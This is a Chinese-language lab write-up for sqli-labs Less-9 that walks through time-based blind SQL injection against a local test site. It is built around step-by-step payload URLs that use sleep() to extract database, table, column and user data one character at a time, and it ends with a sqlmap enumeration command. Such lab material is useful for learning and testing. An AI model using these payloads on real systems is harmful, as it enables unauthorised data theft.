sqli-labs less 9 Get -Blind -Time based -Single quotes

一、(先抛去本关的提示来思考怎么解)在输入id以及更换闭合符号后，发现并不会有回显或者报错，然后再输入and 1=2 后，也没有变化。所以最后只能使用延时注入

二、构造简单的payload来判断闭合符号，如果闭合正确的话会延迟五秒，闭合不正确则不会有延迟，以此来判断这关是单引号闭合

?id=1' and if(length(database())>0,sleep(5),1)--+

三、判断数据库数量,判断正确的话会延迟五秒刷新，因为页面没有变化就不截图了

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(schema_name) from information_schema.schemata)=6,sleep(5),1)--+

四、逐个逐位爆破数据名

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1)--+

五、判断某数据库表数量

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)--+

六、逐个逐位爆破表名

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>50,sleep(5),1)--+

七、判断某表列数

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(column_name) from information_schema.columns where table_name='users')>5,sleep(5),1)--+

八、逐个逐位爆破列名

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>50,sleep(5),1)--+

九、判断数据数量

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(password) from users)=17,sleep(5),1)--+

十、逐个逐位爆数据

http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(1),1)--+

==================================================================================================================================================================================================================================================================
sqlmap爆破users表的全部列

python sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-9/?id=1"  -batch -dbms mysql -D security -T users -columns

over~